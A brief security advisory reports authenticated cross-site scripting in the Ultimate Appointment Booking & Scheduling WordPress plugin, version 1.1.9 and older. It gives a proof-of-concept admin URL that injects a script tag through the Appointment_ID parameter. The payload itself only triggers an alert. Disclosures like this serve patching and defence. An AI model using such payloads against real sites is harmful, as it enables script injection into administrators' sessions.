The Ultimate Appointment Booking & Scheduling WordPress plugin, versions 1.1.9 and older, were vulnerable to Authenticated Cross-Site Scripting (XSS) within multiple parameters.
http://www.example.com/wp-admin/admin.php?page=EWD-UASP-options&Action=EWD_UASP_AppointmentDetails&Selected=Appointment&Appointment_ID=1"><script>alert(1)</script>